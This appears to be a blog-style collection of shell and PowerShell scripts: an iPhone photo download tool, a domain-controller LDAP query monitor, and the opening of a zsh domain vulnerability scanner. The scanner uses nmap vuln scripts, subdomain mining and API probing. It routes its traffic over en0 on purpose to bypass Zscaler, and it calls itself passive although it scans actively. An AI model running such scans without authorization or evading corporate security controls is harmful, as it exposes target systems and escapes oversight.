        rm -f "$TEMP_PATH"
        FAILED_FILES=$((FAILED_FILES + 1))
    fi
done

echo ""
echo "=== Summary ==="
echo "Total files matching pattern: $TOTAL_FILES"
echo "Files downloaded: $COPIED_FILES"
echo "Files already present: $SKIPPED_FILES"
if [ $FAILED_FILES -gt 0 ]; then
    echo "Files failed: $FAILED_FILES"
    echo ""
    echo "⚠ Some files failed to download. Run the script again to retry."
    exit 1
fi
echo ""
echo "✓ Download complete! All files transferred successfully."
OUTER_EOF

echo "Making the script executable..."
chmod +x download-iphone-media.sh

echo "✓ Script created successfully: download-iphone-media.sh"

Usage Examples

Basic Usage

Download all photos and videos to the current directory:

./download-iphone-media.sh

Download with Date Organization

Organize files into folders by creation date (YYYY/MMM structure):

./download-iphone-media.sh -d -o ./Pictures

This creates a structure like:

./Pictures
├── 2024/
│   ├── Jan/
│   │   ├── IMG_1234.jpg
│   │   └── IMG_1235.heic
│   ├── Feb/
│   └── Dec/
├── 2025/
│   ├── Jan/
│   └── Nov/

Filter by File Pattern

Download only specific file types:

# Only JPG files
./download-iphone-media.sh -p "*.jpg" -o ~/Pictures/iPhone

# Only videos (MOV and MP4)
./download-iphone-media.sh -p "*.mov" -o ~/Videos/iPhone
./download-iphone-media.sh -p "*.mp4" -o ~/Videos/iPhone

# Files starting with IMG_
./download-iphone-media.sh -p "IMG_*" -o ~/Pictures

# HEIC photos (iPhone's default format)
./download-iphone-media.sh -p "*.heic" -o ~/Pictures/iPhone

Filter by Date Range

Download photos from a specific date range:

# Photos from January 2025
./download-iphone-media.sh -s 2025-01-01 -e 2025-01-31 -d -o ~/Pictures/January2025

# Photos from last week
./download-iphone-media.sh -s 2025-11-10 -e 2025-11-17 -o ~/Pictures/LastWeek

# Photos after a specific date
./download-iphone-media.sh -s 2025-11-01 -o ~/Pictures/Recent

Combined Filters

Combine multiple options for precise control:

# Download only videos from January 2025, organized by date
./download-iphone-media.sh -p "*.mov" -s 2025-01-01 -e 2025-01-31 -d -o ~/Videos/Vacation

# Download all HEIC photos from the last month, organized by date
./download-iphone-media.sh -p "*.heic" -s 2025-10-17 -e 2025-11-17 -d -o ~/Pictures/LastMonth

Features

Resumable & Idempotent Downloads

  • Crash recovery: Interrupted downloads can be resumed by running the script again
  • Atomic operations: Files are copied to temporary locations first, then moved atomically
  • State tracking: Maintains a hidden state directory (.iphone_download_state) to track completed files
  • Checksum verification: Uses SHA-256 checksums to verify file integrity (can be disabled with -n for speed)
  • No duplicates: Running the script multiple times won’t re-download existing files
  • Corruption detection: Validates file sizes and optionally checksums after copy

Date-Based Organization

  • Automatic folder structure: Creates YYYY/MMM folders based on photo creation date (e.g., 2025/Jan, 2025/Feb)
  • EXIF data support: Reads actual photo capture date from EXIF metadata when available
  • Fallback mechanism: Uses file modification time if EXIF data is unavailable
  • Fewer folders: Maximum 12 month folders per year instead of up to 365 day folders

Smart File Handling

  • Duplicate detection: Skips files that already exist with identical content
  • Conflict resolution: Adds timestamp suffix to filename if different file with same name exists
  • Timestamp preservation: Maintains original creation dates on copied files
  • Error tracking: Reports failed files and provides clear exit codes

Progress Feedback

  • Real-time progress updates showing each file being downloaded
  • Summary statistics at the end (total found, downloaded, skipped, failed)
  • Clear error messages for troubleshooting
  • Helpful resume instructions if interrupted

Common File Patterns

iPhone typically uses these file formats:

TypeExtensionsPattern Example
Photos.jpg.heic*.jpg or *.heic
Videos.mov.mp4*.mov or *.mp4
Screenshots.png*.png
Live Photos.heic.movIMG_*.heic + IMG_*.mov
All mediaall above* (default)

5. Handling Interrupted Downloads

If a download is interrupted (disconnection, error, etc.), simply run the script again:

# Script was interrupted - just run it again
./download-iphone-media.sh -d -o ~/Pictures/iPhone

The script will:

  • Skip all successfully downloaded files
  • Retry any failed files
  • Continue from where it left off

6. Fast Mode (Skip Checksum Verification)

For faster transfers on reliable connections, disable checksum verification:

# Skip checksums for speed (still verifies file sizes)
./download-iphone-media.sh -n -d -o ~/Pictures/iPhone

Note: This is generally safe but won’t detect corruption as thoroughly.

7. Clean State and Re-download

If you want to force a re-download of all files:

# Remove state directory to start fresh
rm -rf ~/Pictures/iPhone/.iphone_download_state
./download-iphone-media.sh -d -o ~/Pictures/iPhone

Troubleshooting

iPhone Not Detected

Error: No iPhone detected. Please connect your iPhone and trust this computer.

Solution:

  1. Make sure your iPhone is connected via USB cable
  2. Unlock your iPhone
  3. Tap “Trust” when prompted on your iPhone
  4. Run idevicepair pair if you haven’t already

Failed to Mount iPhone

Error: Failed to mount iPhone

Solution:

  1. Try unplugging and reconnecting your iPhone
  2. Check if another process is using the iPhone:umount /tmp/iphone_mount 2>/dev/null
  3. Restart your iPhone and try again
  4. On macOS Ventura or later, check System Settings → Privacy & Security → Files and Folders

Permission Denied

Solution:
Make sure the script has executable permissions:

chmod +x download-iphone-media.sh

Missing Tools

Error: Commands not found

Solution:
Install the required tools:

brew install libimobiledevice ifuse exiftool

On newer macOS versions, you may need to install macFUSE:

brew install --cask macfuse

After installation, you may need to restart your Mac and allow the kernel extension in System Settings → Privacy & Security.

Tips and Best Practices

1. Regular Backups

Create a scheduled backup script:

#!/bin/bash
# Save as ~/bin/backup-iphone-photos.sh

DATE=$(date +%Y-%m-%d)
BACKUP_DIR=~/Pictures/iPhone-Backups/$DATE

./download-iphone-media.sh -d -o "$BACKUP_DIR"

echo "Backup completed to $BACKUP_DIR"

2. Incremental Downloads

The script is fully idempotent and tracks completed downloads, making it perfect for incremental backups:

# Run daily to get new photos - only new files will be downloaded
./download-iphone-media.sh -d -o ~/Pictures/iPhone

The script maintains state in .iphone_download_state/ within your output directory, ensuring:

  • Already downloaded files are skipped instantly (no re-copying)
  • Interrupted downloads can be resumed
  • File integrity is verified with checksums

3. Free Up iPhone Storage

After confirming successful download:

  1. Verify files are on your MacBook
  2. Check file counts match
  3. Delete photos from iPhone via Photos app
  4. Empty “Recently Deleted” album

4. Convert HEIC to JPG (Optional)

If you need JPG files for compatibility:

# Install ImageMagick
brew install imagemagick

# Convert all HEIC files to JPG
find ~/Pictures/iPhone -name "*.heic" -exec sh -c 'magick "$0" "${0%.heic}.jpg"' {} \;

How Idempotent Recovery Works

The script implements several mechanisms to ensure safe, resumable downloads:

1. State Tracking

A hidden directory .iphone_download_state/ is created in your output directory. For each successfully downloaded file, a state file is created containing:

  • Destination file path
  • SHA-256 checksum (if verification enabled)
  • Completion timestamp

2. Atomic Operations

Each file is downloaded using a two-phase commit:

  1. Download Phase: Copy to temporary file (.tmp.$$ suffix)
  2. Verification Phase: Check file size and optionally compute checksum
  3. Commit Phase: Atomically move temp file to final destination
  4. Record Phase: Write completion state

If the script is interrupted at any point, incomplete temporary files are cleaned up automatically.

3. Idempotent Behavior

When you run the script:

  1. Before downloading each file, it checks the state directory
  2. If a state file exists, it verifies the destination file still exists and matches the checksum
  3. If verification passes, the file is skipped (no re-download)
  4. If verification fails or no state exists, the file is downloaded

This means:

  • ✓ Safe to run multiple times
  • ✓ Interrupted downloads can be resumed
  • ✓ Corrupted files are detected and re-downloaded
  • ✓ No wasted bandwidth on already-downloaded files

4. Checksum Verification

By default, SHA-256 checksums are computed and verified:

  • During download: Checksum computed after copy completes
  • On resume: Existing files are verified against stored checksum
  • Optional: Use -n flag to skip checksums for speed (still verifies file sizes)

Example Recovery Scenario

# Start downloading 1000 photos
./download-iphone-media.sh -d -o ~/Pictures/iPhone

# Script is interrupted after 500 files
# Press Ctrl+C or cable disconnects

# Simply run again - picks up where it left off
./download-iphone-media.sh -d -o ~/Pictures/iPhone
# Output:
# ✓ Already downloaded: IMG_0001.heic
# ✓ Already downloaded: IMG_0002.heic
# ...
# ⬇ Downloading: IMG_0501.heic → ~/Pictures/iPhone/2025/Jan/IMG_0501.heic

Performance Notes

  • Transfer speed: Depends on USB connection (USB 2.0 vs USB 3.0)
  • Large libraries: May take significant time for thousands of photos
  • EXIF reading: Adds minimal overhead but provides accurate dates
  • Pattern matching: Processed client-side, so all files are scanned

Conclusion

This script provides a robust, production-ready solution for downloading photos and videos from your iPhone to your MacBook. Key capabilities:

Core Features:

  • Filter by file patterns (type, name)
  • Filter by date ranges
  • Organize automatically into date-based folders
  • Preserve original file metadata

Reliability:

  • Fully idempotent – safe to run multiple times
  • Resumable downloads with automatic crash recovery
  • Atomic file operations prevent corruption
  • Checksum verification ensures data integrity
  • Clear error reporting and recovery instructions

For regular use, consider creating aliases in your ~/.zshrc:

# Add to ~/.zshrc
alias iphone-backup='~/download-iphone-media.sh -d -o ~/Pictures/iPhone'
alias iphone-videos='~/download-iphone-media.sh -p "*.mov" -d -o ~/Videos/iPhone'

Then simply run iphone-backup whenever you want to download your photos!

Resources

0
0

Windows Domain Controller: Monitor and Log LDAP operations/queries use of resources

The script below monitors LDAP operations on a Domain Controller and logs detailed information about queries that exceed specified thresholds for execution time, CPU usage, or results returned. It helps identify problematic LDAP queries that may be impacting domain controller performance.

Parameter: ThresholdSeconds
Minimum query duration in seconds to log (default: 5)

Parameter: LogPath
Path where log files will be saved (default: C:\LDAPDiagnostics)

Parameter: MonitorDuration
How long to monitor in minutes (default: continuous)

EXAMPLE
.\Diagnose-LDAPQueries.ps1 -ThresholdSeconds 3 -LogPath “C:\Logs\LDAP”

[CmdletBinding()]
param(
    [int]$ThresholdSeconds = 5,
    [string]$LogPath = "C:\LDAPDiagnostics",
    [int]$MonitorDuration = 0  # 0 = continuous
)

# Requires Administrator privileges
#Requires -RunAsAdministrator

# Create log directory if it doesn't exist
if (-not (Test-Path $LogPath)) {
    New-Item -ItemType Directory -Path $LogPath -Force | Out-Null
}

$logFile = Join-Path $LogPath "LDAP_Diagnostics_$(Get-Date -Format 'yyyyMMdd_HHmmss').log"
$csvFile = Join-Path $LogPath "LDAP_Queries_$(Get-Date -Format 'yyyyMMdd_HHmmss').csv"

function Write-Log {
    param([string]$Message, [string]$Level = "INFO")
    $timestamp = Get-Date -Format "yyyy-MM-dd HH:mm:ss"
    $logMessage = "[$timestamp] [$Level] $Message"
    Write-Host $logMessage
    Add-Content -Path $logFile -Value $logMessage
}

function Get-LDAPStatistics {
    try {
        # Query NTDS performance counters for LDAP statistics
        $ldapStats = @{
            ActiveThreads = (Get-Counter '\NTDS\LDAP Active Threads' -ErrorAction SilentlyContinue).CounterSamples.CookedValue
            SearchesPerSec = (Get-Counter '\NTDS\LDAP Searches/sec' -ErrorAction SilentlyContinue).CounterSamples.CookedValue
            ClientSessions = (Get-Counter '\NTDS\LDAP Client Sessions' -ErrorAction SilentlyContinue).CounterSamples.CookedValue
            BindTime = (Get-Counter '\NTDS\LDAP Bind Time' -ErrorAction SilentlyContinue).CounterSamples.CookedValue
        }
        return $ldapStats
    }
    catch {
        Write-Log "Error getting LDAP statistics: $_" "ERROR"
        return $null
    }
}

function Parse-LDAPEvent {
    param($Event)
    
    $eventData = @{
        TimeCreated = $Event.TimeCreated
        ClientIP = $null
        ClientPort = $null
        StartingNode = $null
        Filter = $null
        SearchScope = $null
        AttributeSelection = $null
        ServerControls = $null
        VisitedEntries = $null
        ReturnedEntries = $null
        TimeInServer = $null
    }

    # Parse event XML for detailed information
    try {
        $xml = [xml]$Event.ToXml()
        $dataNodes = $xml.Event.EventData.Data
        
        foreach ($node in $dataNodes) {
            switch ($node.Name) {
                "Client" { $eventData.ClientIP = ($node.'#text' -split ':')[0] }
                "StartingNode" { $eventData.StartingNode = $node.'#text' }
                "Filter" { $eventData.Filter = $node.'#text' }
                "SearchScope" { $eventData.SearchScope = $node.'#text' }
                "AttributeSelection" { $eventData.AttributeSelection = $node.'#text' }
                "ServerControls" { $eventData.ServerControls = $node.'#text' }
                "VisitedEntries" { $eventData.VisitedEntries = $node.'#text' }
                "ReturnedEntries" { $eventData.ReturnedEntries = $node.'#text' }
                "TimeInServer" { $eventData.TimeInServer = $node.'#text' }
            }
        }
    }
    catch {
        Write-Log "Error parsing event XML: $_" "WARNING"
    }

    return $eventData
}

Write-Log "=== LDAP Query Diagnostics Started ===" "INFO"
Write-Log "Threshold: $ThresholdSeconds seconds" "INFO"
Write-Log "Log Path: $LogPath" "INFO"
Write-Log "Monitor Duration: $(if($MonitorDuration -eq 0){'Continuous'}else{$MonitorDuration + ' minutes'})" "INFO"

# Enable Field Engineering logging if not already enabled
Write-Log "Checking Field Engineering diagnostic logging settings..." "INFO"
try {
    $regPath = "HKLM:\SYSTEM\CurrentControlSet\Services\NTDS\Diagnostics"
    $currentValue = Get-ItemProperty -Path $regPath -Name "15 Field Engineering" -ErrorAction SilentlyContinue
    
    if ($currentValue.'15 Field Engineering' -lt 5) {
        Write-Log "Enabling Field Engineering logging (level 5)..." "INFO"
        Set-ItemProperty -Path $regPath -Name "15 Field Engineering" -Value 5
        Write-Log "Field Engineering logging enabled. You may need to restart NTDS service for full effect." "WARNING"
    }
    else {
        Write-Log "Field Engineering logging already enabled at level $($currentValue.'15 Field Engineering')" "INFO"
    }
}
catch {
    Write-Log "Error configuring diagnostic logging: $_" "ERROR"
}

# Create CSV header
$csvHeader = "TimeCreated,ClientIP,StartingNode,Filter,SearchScope,AttributeSelection,VisitedEntries,ReturnedEntries,TimeInServer,ServerControls"
Set-Content -Path $csvFile -Value $csvHeader

Write-Log "Monitoring for expensive LDAP queries (threshold: $ThresholdSeconds seconds)..." "INFO"
Write-Log "Press Ctrl+C to stop monitoring" "INFO"

$startTime = Get-Date
$queriesLogged = 0

try {
    while ($true) {
        # Check if monitoring duration exceeded
        if ($MonitorDuration -gt 0) {
            $elapsed = (Get-Date) - $startTime
            if ($elapsed.TotalMinutes -ge $MonitorDuration) {
                Write-Log "Monitoring duration reached. Stopping." "INFO"
                break
            }
        }

        # Get current LDAP statistics
        $stats = Get-LDAPStatistics
        if ($stats) {
            Write-Verbose "Active Threads: $($stats.ActiveThreads), Searches/sec: $($stats.SearchesPerSec), Client Sessions: $($stats.ClientSessions)"
        }

        # Query Directory Service event log for expensive LDAP queries
        # Event ID 1644 = expensive search operations
        $events = Get-WinEvent -FilterHashtable @{
            LogName = 'Directory Service'
            Id = 1644
            StartTime = (Get-Date).AddSeconds(-10)
        } -ErrorAction SilentlyContinue

        foreach ($event in $events) {
            $eventData = Parse-LDAPEvent -Event $event
            
            # Convert time in server from milliseconds to seconds
            $timeInSeconds = if ($eventData.TimeInServer) { 
                [int]$eventData.TimeInServer / 1000 
            } else { 
                0 
            }

            if ($timeInSeconds -ge $ThresholdSeconds) {
                $queriesLogged++
                
                Write-Log "=== Expensive LDAP Query Detected ===" "WARNING"
                Write-Log "Time: $($eventData.TimeCreated)" "WARNING"
                Write-Log "Client IP: $($eventData.ClientIP)" "WARNING"
                Write-Log "Duration: $timeInSeconds seconds" "WARNING"
                Write-Log "Starting Node: $($eventData.StartingNode)" "WARNING"
                Write-Log "Filter: $($eventData.Filter)" "WARNING"
                Write-Log "Search Scope: $($eventData.SearchScope)" "WARNING"
                Write-Log "Visited Entries: $($eventData.VisitedEntries)" "WARNING"
                Write-Log "Returned Entries: $($eventData.ReturnedEntries)" "WARNING"
                Write-Log "Attributes: $($eventData.AttributeSelection)" "WARNING"
                Write-Log "Server Controls: $($eventData.ServerControls)" "WARNING"
                Write-Log "======================================" "WARNING"

                # Write to CSV
                $csvLine = "$($eventData.TimeCreated),$($eventData.ClientIP),$($eventData.StartingNode),`"$($eventData.Filter)`",$($eventData.SearchScope),`"$($eventData.AttributeSelection)`",$($eventData.VisitedEntries),$($eventData.ReturnedEntries),$($eventData.TimeInServer),`"$($eventData.ServerControls)`""
                Add-Content -Path $csvFile -Value $csvLine
            }
        }

        Start-Sleep -Seconds 5
    }
}
catch {
    Write-Log "Error during monitoring: $_" "ERROR"
}
finally {
    Write-Log "=== LDAP Query Diagnostics Stopped ===" "INFO"
    Write-Log "Total expensive queries logged: $queriesLogged" "INFO"
    Write-Log "Log file: $logFile" "INFO"
    Write-Log "CSV file: $csvFile" "INFO"
}
```
## Usage Examples

### Basic Usage (Continuous Monitoring)

Run with default settings - monitors queries taking 5+ seconds:

```powershell
.\Diagnose-LDAPQueries.ps1
```

### Custom Threshold and Duration

Monitor for 30 minutes, logging queries that take 3+ seconds:

```powershell
.\Diagnose-LDAPQueries.ps1 -ThresholdSeconds 3 -MonitorDuration 30
```

### Custom Log Location

Save logs to a specific directory:

```powershell
.\Diagnose-LDAPQueries.ps1 -LogPath "D:\Logs\LDAP"
```

### Verbose Output

See real-time LDAP statistics while monitoring:

```powershell
.\Diagnose-LDAPQueries.ps1 -Verbose
```

## Requirements

- **Administrator privileges** on the domain controller
- **Windows Server** with Active Directory Domain Services role
- **PowerShell 5.1 or later**

## Understanding the Output

### Log File Example

```
[2025-01-15 14:23:45] [WARNING] === Expensive LDAP Query Detected ===
[2025-01-15 14:23:45] [WARNING] Time: 01/15/2025 14:23:43
[2025-01-15 14:23:45] [WARNING] Client IP: 192.168.1.50
[2025-01-15 14:23:45] [WARNING] Duration: 8.5 seconds
[2025-01-15 14:23:45] [WARNING] Starting Node: DC=contoso,DC=com
[2025-01-15 14:23:45] [WARNING] Filter: (&(objectClass=user)(memberOf=*))
[2025-01-15 14:23:45] [WARNING] Search Scope: 2
[2025-01-15 14:23:45] [WARNING] Visited Entries: 45000
[2025-01-15 14:23:45] [WARNING] Returned Entries: 12000
```

### What to Look For

- **High visited/returned ratio** - Indicates an inefficient filter
- **Subtree searches from root** - Often unnecessarily broad
- **Wildcard filters** - Like `(cn=*)` can be very expensive
- **Unindexed attributes** - Queries on non-indexed attributes visit many entries
- **Repeated queries** - Same client making the same expensive query repeatedly

## Troubleshooting Common Issues

### No Events Appearing

If you're not seeing Event ID 1644, you may need to lower the expensive search threshold in Active Directory:

```powershell
# Lower the threshold to 1000ms (1 second)
Get-ADObject "CN=Query-Policies,CN=Directory Service,CN=Windows NT,CN=Services,CN=Configuration,DC=yourdomain,DC=com" | 
    Set-ADObject -Replace @{lDAPAdminLimits="MaxQueryDuration=1000"}
```

### Script Requires Restart

After enabling Field Engineering logging, you may need to restart the NTDS service:

```powershell
Restart-Service NTDS -Force
```

Best Practices

1. **Run during peak hours** to capture real-world problematic queries
2. **Start with a lower threshold** (2-3 seconds) to catch more queries
3. **Analyze the CSV** in Excel or Power BI for patterns
4. **Correlate with client IPs** to identify problematic applications
5. **Work with application owners** to optimize queries with indexes or better filters

Once you’ve identified expensive queries:

1. **Add indexes** for frequently searched attributes
2. **Optimize LDAP filters** to be more specific
3. **Reduce search scope** where possible
4. **Implement paging** for large result sets
5. **Cache results** on the client side when appropriate

This script has helped me identify numerous performance bottlenecks in production environments. I hope it helps you optimize your Active Directory infrastructure as well!

0
0

Macbook: Enhanced Domain Vulnerability Scanner

Below is a fairly comprehensive passive penetration testing script with vulnerability scanning, API testing, and detailed reporting.

Features

  • DNS & SSL/TLS Analysis – Complete DNS enumeration, certificate inspection, cipher analysis
  • Port & Vulnerability Scanning – Service detection, NMAP vuln scripts, outdated software detection
  • Subdomain Discovery – Certificate transparency log mining
  • API Security Testing – Endpoint discovery, permission testing, CORS analysis
  • Asset Discovery – Web technology detection, CMS identification
  • Firewall Testing – hping3 TCP/ICMP tests (if available)
  • Network Bypass – Uses en0 interface to bypass Zscaler
  • Debug Mode – Comprehensive logging enabled by default

Installation

Required Dependencies

# macOS
brew install nmap openssl bind curl jq

# Linux
sudo apt-get install nmap openssl dnsutils curl jq

Optional Dependencies

# macOS
brew install hping

# Linux
sudo apt-get install hping3 nikto

Usage

Basic Syntax

./security_scanner_enhanced.sh -d DOMAIN [OPTIONS]

Options

  • -d DOMAIN – Target domain (required)
  • -s – Enable subdomain scanning
  • -m NUM – Max subdomains to scan (default: 10)
  • -v – Enable vulnerability scanning
  • -a – Enable API discovery and testing
  • -h – Show help

Examples:

# Basic scan
./security_scanner_enhanced.sh -d example.com

# Full scan with all features
./security_scanner_enhanced.sh -d example.com -s -m 20 -v -a

# Vulnerability assessment only
./security_scanner_enhanced.sh -d example.com -v

# API security testing
./security_scanner_enhanced.sh -d example.com -a

Network Configuration

Default Interface: en0 (bypasses Zscaler)

To change the interface, edit line 24:

NETWORK_INTERFACE="en0"  # Change to your interface

The script automatically falls back to default routing if the interface is unavailable.

Debug Mode

Debug mode is enabled by default and shows:

  • Dependency checks
  • Network interface status
  • Command execution details
  • Scan progress
  • File operations

Debug messages appear in cyan with [DEBUG] prefix.

To disable, edit line 27:

DEBUG=false

Output

Each scan creates a timestamped directory: scan_example.com_20251016_191806/

Key Files

  • executive_summary.md – High-level findings
  • technical_report.md – Detailed technical analysis
  • vulnerability_report.md – Vulnerability assessment (if -v used)
  • api_security_report.md – API security findings (if -a used)
  • dns_*.txt – DNS records
  • ssl_*.txt – SSL/TLS analysis
  • port_scan_*.txt – Port scan results
  • subdomains_discovered.txt – Found subdomains (if -s used)

Scan Duration

Scan TypeDuration
Basic2-5 min
With subdomains+1-2 min/subdomain
With vulnerabilities+10-20 min
Full scan15-30 min

Troubleshooting

Missing dependencies

# Install required tools
brew install nmap openssl bind curl jq  # macOS
sudo apt-get install nmap openssl dnsutils curl jq  # Linux

Interface not found

# Check available interfaces
ifconfig

# Script will automatically fall back to default routing

Permission errors

# Some scans may require elevated privileges
sudo ./security_scanner_enhanced.sh -d example.com

Configuration

Change scan ports (line 325)

# Default: top 1000 ports
--top-ports 1000

# Custom ports
-p 80,443,8080,8443

# All ports (slow)
-p-

Adjust subdomain limit (line 1162)

MAX_SUBDOMAINS=10  # Change as needed

Add custom API paths (line 567)

API_PATHS=(
    "/api"
    "/api/v1"
    "/custom/endpoint"  # Add yours
)

⚠️ WARNING: Only scan domains you own or have explicit permission to test. Unauthorized scanning may be illegal.

This tool performs passive reconnaissance only:

  • ✅ DNS queries, certificate logs, public web requests
  • ❌ No exploitation, brute force, or denial of service

Best Practices

  1. Obtain proper authorization before scanning
  2. Monitor progress via debug output
  3. Review all generated reports
  4. Prioritize findings by risk
  5. Schedule follow-up scans after remediation

Disclaimer: This tool is for authorized security testing only. The authors assume no liability for misuse or damage.

The Script:

cat > ./security_scanner_enhanced.sh << 'EOF'
#!/bin/zsh

################################################################################
# Enhanced Security Scanner Script v2.0
# Comprehensive security assessment with vulnerability scanning
# Includes: NMAP vuln scripts, hping3, asset discovery, API testing
# Network Interface: en0 (bypasses Zscaler)
# Debug Mode: Enabled
################################################################################

# Color codes for output
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
BLUE='\033[0;34m'
MAGENTA='\033[0;35m'
CYAN='\033[0;36m'
NC='\033[0m' # No Color

# Script version
VERSION="2.0.1"

# Network interface to use (bypasses Zscaler)
NETWORK_INTERFACE="en0"

# Debug mode flag
DEBUG=true

################################################################################
# Usage Information
################################################################################
usage() {
    cat << EOF
Enhanced Security Scanner v${VERSION}

Usage: $0 -d DOMAIN [-s] [-m MAX_SUBDOMAINS] [-v] [-a]

Options:
    -d DOMAIN           Target domain to scan (required)
    -s                  Scan subdomains (optional)
    -m MAX_SUBDOMAINS   Maximum number of subdomains to scan (default: 10)
    -v                  Enable vulnerability scanning (NMAP vuln scripts)
    -a                  Enable API discovery and testing
    -h                  Show this help message

Network Configuration:
    Interface: $NETWORK_INTERFACE (bypasses Zscaler)
    Debug Mode: Enabled

Examples:
    $0 -d example.com
    $0 -d example.com -s -m 20 -v
    $0 -d example.com -s -v -a

EOF
    exit 1
}

################################################################################
# Logging Functions
################################################################################
log_info() {
    echo -e "${BLUE}[INFO]${NC} $1"
}

log_success() {
    echo -e "${GREEN}[SUCCESS]${NC} $1"
}

log_warning() {
    echo -e "${YELLOW}[WARNING]${NC} $1"
}

log_error() {
    echo -e "${RED}[ERROR]${NC} $1"
}

log_vuln() {
    echo -e "${MAGENTA}[VULN]${NC} $1"
}

log_debug() {
    if [ "$DEBUG" = true ]; then
        echo -e "${CYAN}[DEBUG]${NC} $1"
    fi
}

################################################################################
# Check Dependencies
################################################################################
check_dependencies() {
    log_info "Checking dependencies..."
    log_debug "Starting dependency check"
    
    local missing_deps=()
    local optional_deps=()
    
    # Required dependencies
    log_debug "Checking for nmap..."
    command -v nmap >/dev/null 2>&1 || missing_deps+=("nmap")
    log_debug "Checking for openssl..."
    command -v openssl >/dev/null 2>&1 || missing_deps+=("openssl")
    log_debug "Checking for dig..."
    command -v dig >/dev/null 2>&1 || missing_deps+=("dig")
    log_debug "Checking for curl..."
    command -v curl >/dev/null 2>&1 || missing_deps+=("curl")
    log_debug "Checking for jq..."
    command -v jq >/dev/null 2>&1 || missing_deps+=("jq")
    
    # Optional dependencies
    log_debug "Checking for hping3..."
    command -v hping3 >/dev/null 2>&1 || optional_deps+=("hping3")
    log_debug "Checking for nikto..."
    command -v nikto >/dev/null 2>&1 || optional_deps+=("nikto")
    
    if [ ${#missing_deps[@]} -ne 0 ]; then
        log_error "Missing required dependencies: ${missing_deps[*]}"
        log_info "Install missing dependencies and try again"
        exit 1
    fi
    
    if [ ${#optional_deps[@]} -ne 0 ]; then
        log_warning "Missing optional dependencies: ${optional_deps[*]}"
        log_info "Some features may be limited"
    fi
    
    # Check network interface
    log_debug "Checking network interface: $NETWORK_INTERFACE"
    if ifconfig "$NETWORK_INTERFACE" >/dev/null 2>&1; then
        log_success "Network interface $NETWORK_INTERFACE is available"
        local interface_ip=$(ifconfig "$NETWORK_INTERFACE" | grep 'inet ' | awk '{print $2}')
        log_debug "Interface IP: $interface_ip"
    else
        log_warning "Network interface $NETWORK_INTERFACE not found, using default routing"
        NETWORK_INTERFACE=""
    fi
    
    log_success "All required dependencies found"
}

################################################################################
# Initialize Scan
################################################################################
initialize_scan() {
    log_debug "Initializing scan for domain: $DOMAIN"
    SCAN_DATE=$(date +"%Y-%m-%d %H:%M:%S")
    SCAN_DIR="scan_${DOMAIN}_$(date +%Y%m%d_%H%M%S)"
    
    log_debug "Creating scan directory: $SCAN_DIR"
    mkdir -p "$SCAN_DIR"
    cd "$SCAN_DIR" || exit 1
    
    log_success "Created scan directory: $SCAN_DIR"
    log_debug "Current working directory: $(pwd)"
    
    # Initialize report files
    EXEC_REPORT="executive_summary.md"
    TECH_REPORT="technical_report.md"
    VULN_REPORT="vulnerability_report.md"
    API_REPORT="api_security_report.md"
    
    log_debug "Initializing report files"
    > "$EXEC_REPORT"
    > "$TECH_REPORT"
    > "$VULN_REPORT"
    > "$API_REPORT"
    
    log_debug "Scan configuration:"
    log_debug "  - Domain: $DOMAIN"
    log_debug "  - Subdomain scanning: $SCAN_SUBDOMAINS"
    log_debug "  - Max subdomains: $MAX_SUBDOMAINS"
    log_debug "  - Vulnerability scanning: $VULN_SCAN"
    log_debug "  - API scanning: $API_SCAN"
    log_debug "  - Network interface: $NETWORK_INTERFACE"
}

################################################################################
# DNS Reconnaissance
################################################################################
dns_reconnaissance() {
    log_info "Performing DNS reconnaissance..."
    log_debug "Resolving domain: $DOMAIN"
    
    # Resolve domain to IP
    IP_ADDRESS=$(dig +short "$DOMAIN" | grep -E '^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$' | head -n1)
    
    if [ -z "$IP_ADDRESS" ]; then
        log_error "Could not resolve domain: $DOMAIN"
        log_debug "DNS resolution failed for $DOMAIN"
        exit 1
    fi
    
    log_success "Resolved $DOMAIN to $IP_ADDRESS"
    log_debug "Target IP address: $IP_ADDRESS"
    
    # Get comprehensive DNS records
    log_debug "Querying DNS records (ANY)..."
    dig "$DOMAIN" ANY > dns_records.txt 2>&1
    log_debug "Querying A records..."
    dig "$DOMAIN" A > dns_a_records.txt 2>&1
    log_debug "Querying MX records..."
    dig "$DOMAIN" MX > dns_mx_records.txt 2>&1
    log_debug "Querying NS records..."
    dig "$DOMAIN" NS > dns_ns_records.txt 2>&1
    log_debug "Querying TXT records..."
    dig "$DOMAIN" TXT > dns_txt_records.txt 2>&1
    
    # Reverse DNS lookup
    log_debug "Performing reverse DNS lookup for $IP_ADDRESS..."
    dig -x "$IP_ADDRESS" > reverse_dns.txt 2>&1
    
    echo "$IP_ADDRESS" > ip_address.txt
    log_debug "DNS reconnaissance complete"
}

################################################################################
# Subdomain Discovery
################################################################################
discover_subdomains() {
    if [ "$SCAN_SUBDOMAINS" = false ]; then
        log_info "Subdomain scanning disabled"
        log_debug "Skipping subdomain discovery"
        echo "0" > subdomain_count.txt
        return
    fi
    
    log_info "Discovering subdomains via certificate transparency..."
    log_debug "Querying crt.sh for subdomains of $DOMAIN"
    log_debug "Maximum subdomains to discover: $MAX_SUBDOMAINS"
    
    # Query crt.sh for subdomains
    curl -s "https://crt.sh/?q=%25.${DOMAIN}&output=json" | \
        jq -r '.[].name_value' | \
        sed 's/\*\.//g' | \
        sort -u | \
        grep -E "^[a-zA-Z0-9]([a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?\.${DOMAIN}$" | \
        head -n "$MAX_SUBDOMAINS" > subdomains_discovered.txt
    
    SUBDOMAIN_COUNT=$(wc -l < subdomains_discovered.txt)
    echo "$SUBDOMAIN_COUNT" > subdomain_count.txt
    
    log_success "Discovered $SUBDOMAIN_COUNT subdomains (limited to $MAX_SUBDOMAINS)"
    log_debug "Subdomains saved to: subdomains_discovered.txt"
}

################################################################################
# SSL/TLS Analysis
################################################################################
ssl_tls_analysis() {
    log_info "Analyzing SSL/TLS configuration..."
    log_debug "Connecting to ${DOMAIN}:443 for certificate analysis"
    
    # Get certificate details
    log_debug "Extracting certificate details..."
    echo | openssl s_client -connect "${DOMAIN}:443" -servername "$DOMAIN" 2>/dev/null | \
        openssl x509 -noout -text > certificate_details.txt 2>&1
    
    # Extract key information
    log_debug "Extracting certificate issuer..."
    CERT_ISSUER=$(echo | openssl s_client -connect "${DOMAIN}:443" -servername "$DOMAIN" 2>/dev/null | \
        openssl x509 -noout -issuer | sed 's/issuer=//')
    
    log_debug "Extracting certificate subject..."
